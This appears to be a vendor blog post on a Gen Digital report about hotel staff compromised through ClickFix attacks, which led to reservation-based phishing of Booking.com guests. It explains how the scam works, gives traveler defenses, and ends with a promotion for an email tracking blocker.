Light bulb Limited Spots Available: Secure Your Lifetime Subscription on Gumroad!

Jun 01, 2026 · 6 min read

350 Hotels Compromised, 6M Guest Stays Get Phishing Emails

Gen Digital's Norton research team published a May 28, 2026 report documenting at least 350 compromised accommodations across 50 countries—reached not through a Booking.com breach but through ClickFix attacks that turned hotel staff into the entry point. The downstream effect is targeted phishing emails sitting in roughly six million guests' inboxes a year, each one quoting a real reservation.

The Reservation Hijack scam is what targeted email phishing looks like when the attacker holds your actual booking. They know which hotel you booked, which dates you arrive, what you paid, the room type, the name on the reservation, and the email address you used. The phishing message lands at the moment you would expect a real one—a few days before check-in, when the hotel front desk often does send a real "please confirm your card details" follow up. The fake message is indistinguishable from the real workflow because it is the real workflow, with a different payment link.

Key Takeaways

  • Gen Digital's Norton team, led by Luis Corrons and malware researcher Martin Chlumecký, documented 350 compromised hotels and accommodations across 50 countries in a report published May 28, 2026.
  • Five European countries account for 159 of the 350 properties: Germany (49), France (35), the United Kingdom (31), Italy (24), and Spain (20); the United States adds 19, and the rest spread across 44 other countries.
  • The compromise vector is not a Booking.com breach but a ClickFix attack on hotel staff—employees follow what looks like a "computer fix" prompt and install malware that hands their reservation system access to the attacker.
  • With 82,000 simultaneous guest capacity across the affected properties, Gen Digital estimates 6 million guest stays a year are exposed to follow-up scams that arrive with real booking details intact.
  • Scam messages reach victims through email, SMS, WhatsApp, and the in-app messaging built into Booking.com itself—every channel where a real hotel might legitimately contact a guest before check-in.
A hotel reception desk at dusk with a brass bell, open reservation ledger, room key cards, and a smartphone showing a generic email preview

How Does the Reservation Hijack Scam Actually Reach You?

Most phishing depends on the recipient ignoring small inconsistencies. The Reservation Hijack scam has none of the inconsistencies. The message comes from the right context (an upcoming stay), at the right time (a few days before check-in), with the right details (your name, your reservation number, your booked dates, the room you actually selected). It arrives on the channel the hotel ordinarily uses—often the Booking.com in-app messaging thread that already contains the original reservation confirmation.

According to Gen Digital's research report, scammers most commonly impersonate the hotel front desk asking for an additional card verification, a deposit, or a "missed payment" on the reservation. The link in the message routes to a fraudulent page that is customized for the specific accommodation—the hotel's logo, color scheme, and even photographs are pulled from the real property's listing, so visually the page is correct. The form behind the page captures the new card number and CVV the guest enters, and the scam keeps moving to the next reservation in the queue.

This is not a one-shot phishing campaign. Because the attacker holds the live reservation system access, every new booking made to the affected hotel generates a fresh target with fresh data. The same scam runs continuously until the hotel detects the unauthorized access and revokes the credential.

Why Are Booking.com Partners Easier to Compromise Than Booking.com Itself?

Booking.com runs central security on its core platform—two-factor authentication, anomalous login detection, the standard SaaS defenses. The 350 compromised properties are not the platform; they are the individual hotel staff accounts that connect to the partner extranet to manage reservations. Hotel front-desk computers tend to be older Windows machines used for many things besides Booking, and the staff who log in are not security trained.

The ClickFix technique exploits exactly that profile. The staffer receives an email referencing a guest complaint, an "urgent" reservation issue, or a system update. The message directs them to a webpage with a "verify you are human" panel that asks them to press Win+R, paste a string, and press Enter. The string runs a PowerShell command that downloads an infostealer or remote access trojan. From the moment the staffer pastes and presses Enter, the attacker has the Booking.com partner credentials, the desktop session, and whatever else the front office computer can reach. We have covered the underlying ClickFix mechanism in the Ghost CMS ClickFix 700 sites campaign and in the ClickFix Windows Terminal Lumma Stealer case—the same delivery primitive, different targets.

What Exactly Do the Scammers Have on You?

Once a hotel's Booking.com partner extranet account is compromised, the attacker reads every reservation in the system. For each guest, that yields:

  • Full guest name as it appears on the booking.
  • Email address provided at booking.
  • Phone number, when provided.
  • Check-in and check-out dates.
  • Room type, number of guests, and any special requests typed into the booking notes.
  • Payment details captured by Booking.com at reservation time, often including masked or partial card numbers and billing address.
  • Property-specific context like "guest mentioned they are arriving late," "guest is traveling with a baby," or "guest requested a quieter room"—every detail a guest casually types into a booking note becomes ammunition.

That context is what makes the follow-up phishing so effective. A scammer writing "We need to verify the card on file for your check-in on June 14 with the king bed and the late arrival you noted" cannot be defeated by any visual phishing tell. The details are real.

How Do You Protect Yourself Before Your Next Trip?

There is no defense that depends on noticing inconsistencies in the scam message, because the message is internally consistent. The defenses that actually work are channel-based and behavioral:

  1. Never enter card details on a link you received. If a hotel says they need card verification, hang up or close the message, then log into Booking.com directly through the app or the bookmarked website and check the reservation page yourself. Real verification requests are also visible in the Booking.com app, not just in email.
  2. Call the hotel's main reception number from the property's official website. Not the number in the suspicious message. The phone tree of any real hotel can tell you in 30 seconds whether they actually sent the message.
  3. Use a virtual card or single-use card number for booking deposits. Apple Pay's per-merchant card, Privacy.com, Revolut virtual cards, and most major bank apps now offer this. If a virtual card is exposed in the next Reservation Hijack wave, you can disable it without affecting your real card.
  4. Block tracking pixels in your booking confirmation emails. Email tracking pixels in hotel and travel marketing reveal when you opened the message, which device you used, and roughly where you were—exactly the signals a scammer would use to time the follow-up. Gblock strips those pixels out of Gmail before they call home, so a compromised hotel partner who is monitoring "did the guest open the confirmation" does not get a useful answer.
  5. Treat WhatsApp and SMS messages about your booking with extra skepticism. Most legitimate hotels do not initiate WhatsApp or SMS exchanges about payment changes. Those channels are heavily favored by Reservation Hijack scammers because they are harder for Booking.com to monitor.

What Booking.com Could Do Differently

The structural fix is on Booking.com's side. The partner extranet is the credential surface that attackers want; hardening it is what would shut down the Reservation Hijack pipeline. Hardware-key MFA for all partner accounts above a certain reservation volume, phishing-resistant authentication for the in-app messaging system, and an explicit "your hotel will never ask you to pay through this link" warning embedded in every guest-facing message would all reduce the blast radius. Until those changes ship, the burden is on travelers to assume that any payment request after the initial booking is hostile until verified out of band.

Why This Should Worry Every Traveler

Gen Digital's 350 properties is the number researchers could verify clearly. The actual scale is almost certainly larger—every property that has been compromised but not yet documented is still pumping reservation data to scammers. With 6 million guest stays a year passing through the visible subset alone, the Reservation Hijack scam is likely the most successful targeted phishing campaign in the travel sector right now, and the people who pay are travelers who did everything they were told to do: booked through a major platform, used a reputable hotel, and trusted the email in their inbox.

Stop Email Tracking in Gmail

Spy pixels track when you open emails, where you are, and what device you use. Gblock blocks them automatically.

Try Gblock Free for 30 Days

No credit card required. Works with Chrome, Edge, Brave, and Arc.